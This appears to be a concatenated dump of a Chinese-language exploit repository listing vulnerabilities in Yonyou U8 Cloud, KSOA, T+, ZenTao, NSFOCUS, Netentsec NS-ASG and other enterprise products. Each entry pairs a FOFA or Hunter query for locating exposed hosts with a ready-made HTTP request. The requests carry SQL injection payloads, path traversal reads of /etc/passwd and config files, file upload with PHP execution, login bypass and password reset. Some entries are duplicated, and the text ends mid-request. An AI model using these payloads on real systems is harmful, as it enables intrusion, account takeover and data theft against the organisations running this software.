1 | ## 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞
2 |
3 | 用友U8 Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
4 |
5 | 资产测绘
6 | ## fofa
7 | ```
8 | app="用友-U8-Cloud"
9 | ```
10 |
11 | ## poc
12 | ```
13 | GET /servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd HTTP/1.1
14 | Host:
15 | X-Forwarded-For: 127.0.0.1
16 | Cookie: JSESSIONID=D523370AE42E1D2363160250C914E62A.server
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8_Cloud-base64存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8_Cloud-base64存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | GET /u8cloud/api/file/upload/base64 HTTP/1.1
7 | Host: your-ip
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
9 | system: -1' or 1=@@version--+
10 | ```
11 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | app="用友U8 Cloud"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
11 | host:127.0.0.1
12 |
13 | {"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
14 | ```
15 |
16 | 
17 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | app="用友-U8-Cloud"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
11 | Host: url
12 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
13 | Content-Type: application/json
14 | Accept-Encoding: gzip
15 | Connection: close
16 |
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
7 | Host: url
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 | Content-Type: application/json
10 | Accept-Encoding: gzip
11 | Connection: close
12 |
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友Ufida-ELTextFile.load.d任意文件读取漏洞
2 |
3 | 用友Ufida /hrss/ELTextFile.load.d 存在任意文件读取漏洞
4 |
5 | ## fofa
6 |
7 | ```
8 | icon_hash="-628229493"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /hrss/ELTextFile.load.d?src=WEB-INF/web.xml HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
17 | Accept: application/json, text/javascript, */*; q=0.01
18 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
19 | Accept-Encoding: gzip, deflate
20 | Connection: close
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友crm客户关系管理help.php存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友crm客户关系管理help.php存在任意文件读取漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="用友 U8CRM"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 |
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-U8-Cloud"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | POST /servlet/ESBInvokerServlet HTTP/1.1
15 | Host: ip
16 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
17 | Accept:
18 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7
19 | Content-Length: 1123
20 |
21 | 反序列内容
22 | ```
23 |
24 | 使用使用cc6链生成payload打即可
--------------------------------------------------------------------------------
/wpoc/用友OA/用友u9系统接口TransWebService存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友u9系统接口TransWebService存在未授权访问漏洞
2 | 用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友u9 TransWebService存在未授权访问漏洞
3 |
4 | ## Hunter
5 |
6 | ```javascript
7 | web.body="logo-u9.png"
8 | ```
9 |
10 | ## poc
11 | ```plain
12 | /U9Supplier/CS/Office/TransWebService.asmx
13 | ```
14 |
15 | 
16 |
17 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友政务财务系统FileDownload存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友政务财务系统FileDownload存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="用友-政务财务系统"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /bg/attach/FileDownload?execlPath=C://Windows//win.ini
11 |
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友时空KSOA-imagefield接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友时空KSOA-imagefield接口存在SQL注入漏洞
2 |
3 | 用友时空KSOA imagefield接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
4 |
5 | ## fofa
6 | ```
7 | app="用友-时空KSOA"
8 | ```
9 |
10 | ## poc
11 | ```
12 | /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+
13 |
14 | ```
15 |
16 | 
17 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友时空KSOA-linkadd.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友时空KSOA-linkadd.jsp存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | title="企业信息系统门户"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1
11 | Host: your-ip
12 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
13 | Accept: */*
14 | Connection: Keep-Alive
15 | ```
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞
2 |
3 | 用友时空KSOA接口 `/kp/PrintZP.jsp` 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-时空KSOA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+--+ HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
17 | Connection: close
18 | ```
19 |
20 |
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞
2 |
3 | 用友时空KSOA接口 `/kp//PrintZPFB.jsp` 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-时空KSOA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,4,db_name()+--+ HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
17 | Connection: close
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞
2 |
3 | 用友时空KSOA接口 `/kp//PrintZPZP.jsp` 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-时空KSOA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+ HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
17 | Connection: close
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞
2 |
3 | 用友时空KSOA接口 `/kp/fillKP.jsp` 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-时空KSOA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+--+ HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
17 | Connection: close
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="畅捷通-TPlus"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
12 | X-Ajaxpro-Method: GetStoreWarehouseByStore
13 | User-Agent: Java/1.8.0_381
14 | Host: xx.xx.xx.xx
15 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
16 | Connection: close
17 | ```
18 |
19 | 
20 |
--------------------------------------------------------------------------------
/wpoc/用友OA/畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | app="畅捷通-TPlus"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+ HTTP/1.1
12 | Host: 127.0.0.1
13 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
14 | Accept: */*
15 | Connection: Keep-Alive
16 | ```
17 |
--------------------------------------------------------------------------------
/wpoc/申瓯通信在线录音管理系统/申瓯通信在线录音管理系统download任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 申瓯通信在线录音管理系统download任意文件读取漏洞
2 |
3 | 申瓯通信在线录音管理系统download任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。
4 |
5 | ## fofa
6 |
7 | ```
8 | title="在线录音管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /main/download?path=/etc/passwd HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: keep-alive
20 | ```
21 |
22 | 
--------------------------------------------------------------------------------
/wpoc/百易云资产管理系统/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞
2 |
3 | 百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="不要着急,点此"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(2)))OKTO) HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: close
20 |
21 |
22 | ```
23 |
--------------------------------------------------------------------------------
/wpoc/禅道/禅道 16.5 router.class.php SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 禅道 16.5 router.class.php SQL注入漏洞
2 | ```
3 | POST /user-login.html
4 | account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
5 | ```
6 |
--------------------------------------------------------------------------------
/wpoc/禅道/禅道-16.5-router.class.php-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 禅道 16.5 router.class.php SQL注入漏洞
2 | ```
3 | POST /user-login.html
4 | account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
5 | ```
6 |
--------------------------------------------------------------------------------
/wpoc/禅道/禅道20.7后台任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 禅道20.7后台任意文件读取漏洞
2 |
3 | 禅道20.7后台任意文件读取漏洞,只能读取网站目录下的文件
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | app="易软天创-禅道系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/福建科立讯通信/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | body="app/structure/departments.php"||app="指挥调度管理平台"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /app/ext/ajax_users.php HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
13 | Content-Type: application/x-www-form-urlencoded
14 |
15 | dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
16 | ```
17 |
--------------------------------------------------------------------------------
/wpoc/私有云管理平台/私有云管理平台存在登录绕过漏洞.md:
--------------------------------------------------------------------------------
1 | # 私有云管理平台存在登录绕过漏洞
2 |
3 | 私有云管理平台存在登录绕过漏洞
4 |
5 | ## hunter
6 |
7 | ```yaml
8 | web.title="私有云管理后台"
9 | ```
10 |
11 | ## poc
12 |
13 | 登陆界面抓包改返回响应的数据
14 |
15 | ```java
16 | {"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}
17 | ```
18 |
19 | 
20 |
21 | 
--------------------------------------------------------------------------------
/wpoc/科荣AIO/科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="changeAccount('8000')"
6 | ```
7 | ## 目录遍历
8 | ```
9 | http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
10 | ```
11 |
12 | ## 文件上传
13 | ```
14 | POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
15 | Host: xxxxxx
16 | Connection: lose
17 | Content-Type: application/x-www-form-urlencoded
18 | Content-Length: 2
19 |
20 | demo
21 | ```
22 |
23 | ## 任意文件读取
24 | ```
25 | http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
26 | ```
27 |
--------------------------------------------------------------------------------
/wpoc/科荣AIO/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="changeAccount('8000')"
6 | ```
7 | ## 目录遍历
8 | ```
9 | http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
10 | ```
11 |
12 | ## 文件上传
13 | ```
14 | POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
15 | Host: xxxxxx
16 | Connection: lose
17 | Content-Type: application/x-www-form-urlencoded
18 | Content-Length: 2
19 |
20 | demo
21 | ```
22 |
23 | ## 任意文件读取
24 | ```
25 | http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
26 | ```
27 |
--------------------------------------------------------------------------------
/wpoc/科荣AIO/科荣AIO-ReadFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 科荣AIO-ReadFile存在任意文件读取漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | /ReadFile?tempFile=path&path=../../website/WEB-INF/&fileName=web.xml
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/科讯图书馆综合管理云平台/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞
2 |
3 | 科讯校园一卡通管理系统get_kq_tj_today存在SQL注入漏洞,未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="http://www.ahkxsoft.com/" && body="一卡通登录"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Accept-Encoding: gzip, deflate
18 | Accept-Language: zh-CN,zh;q=0.9
19 | Connection: close
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/章管家-印章智慧管理平台/章管家updatePwd.htm存在任意账号密码重置漏洞.md:
--------------------------------------------------------------------------------
1 | # 章管家updatePwd.htm存在任意账号密码重置漏洞
2 |
3 | 章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。
4 |
5 | ```yaml
6 | app="章管家-印章智慧管理平台"
7 | ```
8 |
9 | ## poc
10 |
11 | ```java
12 | POST /app/updatePwd.htm HTTP/1.1
13 | Host:
14 | User-Agent: python-requests/2.31.0
15 | Accept-Encoding: gzip, deflate, br
16 | Accept: */*
17 | Connection: close
18 | Content-Length: 87
19 | Content-Type: application/x-www-form-urlencoded
20 |
21 | mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/wpoc/红海云eHR/红海云eHR系统pc.mob存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 红海云eHR系统pc.mob存在sql注入漏洞
2 |
3 | 红海云eHR系统pc.mob存在sql注入漏洞
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="/RedseaPlatform/skins/images/favicon.ico"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /RedseaPlatform/goApp/pc.mob?id=1%27%20AND%20(SELECT%204802%20FROM%20(SELECT(SLEEP(5)))ndMq)%20AND%20%27NEoX%27=%27NEoX HTTP/1.1
15 | Host: {{Hostname}}
16 | Cookie: JSESSIONID=905D36CF9349B41FBFB0203D2BAA8CCC
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/绿盟/某盟 SAS堡垒机 local_user.php 任意用户登录漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
2 | ```
3 |
4 | GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
5 | Host: 1.1.1.1
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | ```
10 |
--------------------------------------------------------------------------------
/wpoc/绿盟/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
2 | ```
3 |
4 | GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
5 | Host: 1.1.1.1
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | ```
10 |
--------------------------------------------------------------------------------
/wpoc/绿盟/某盟sas安全审计系统任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某盟sas安全审计系统任意文件读取漏洞
2 | ```
3 | /webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
4 | ```
5 |
--------------------------------------------------------------------------------
/wpoc/绿盟/绿盟 NF 下一代防火墙 任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 绿盟 NF 下一代防火墙 任意文件上传漏洞
2 | ```
3 | POST /api/v1/device/bugsInfo HTTP/1.1
4 | Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
5 | Host:
6 | --4803b59d015026999b45993b1245f0ef
7 | Content-Disposition: form-data; name="file"; filename="compose.php"
8 |
9 | --4803b59d015026999b45993b1245f0ef--
10 | POST /mail/include/header_main.php HTTP/1.1
11 | Content-Type: application/x-www-form-urlencoded
12 | Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
13 | Host:
14 | cmd=phpinfo();
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/绿盟/绿盟-NF-下一代防火墙-任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 绿盟 NF 下一代防火墙 任意文件上传漏洞
2 | ```
3 | POST /api/v1/device/bugsInfo HTTP/1.1
4 | Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
5 | Host:
6 | --4803b59d015026999b45993b1245f0ef
7 | Content-Disposition: form-data; name="file"; filename="compose.php"
8 |
9 | --4803b59d015026999b45993b1245f0ef--
10 | POST /mail/include/header_main.php HTTP/1.1
11 | Content-Type: application/x-www-form-urlencoded
12 | Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
13 | Host:
14 | cmd=phpinfo();
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网动统一通信平台ActiveUC存在任意文件下载漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | title="网动统一通信平台(Active UC)"
7 | ```
8 |
9 |
10 | ## poc
11 | ```
12 | http://ip/acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml&filename=xxx
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/网康科技/网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | app="网康NS-ASG应用安全网关"
7 | ```
8 |
9 | ## poc
10 | ```
11 | http://ip/admin/singlelogin.php?submit=1&loginId=1*
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/网康科技/网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | app="网康科技-NS-ASG安全网关"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /admin/add_ikev2.php?TunnelId=1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(1)),0x7e)) HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
13 | Accept-Charset: utf-8
14 | Accept-Encoding: gzip, deflate
15 | Connection: close
16 |
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/网康科技/网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | app="网康科技-NS-ASG安全网关"
7 | ```
8 |
9 |
10 | ## poc
11 | ```
12 | GET /admin/add_postlogin.php?SingleLoginId=1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
15 | Accept-Charset: utf-8
16 | Accept-Encoding: gzip, deflate
17 | Connection: close
18 |
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/网康科技/网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | app="网康科技-NS-ASG安全网关
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /admin/config_Anticrack.php?GroupId=1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+version()),0x7e)) HTTP/1.1
11 | Host:
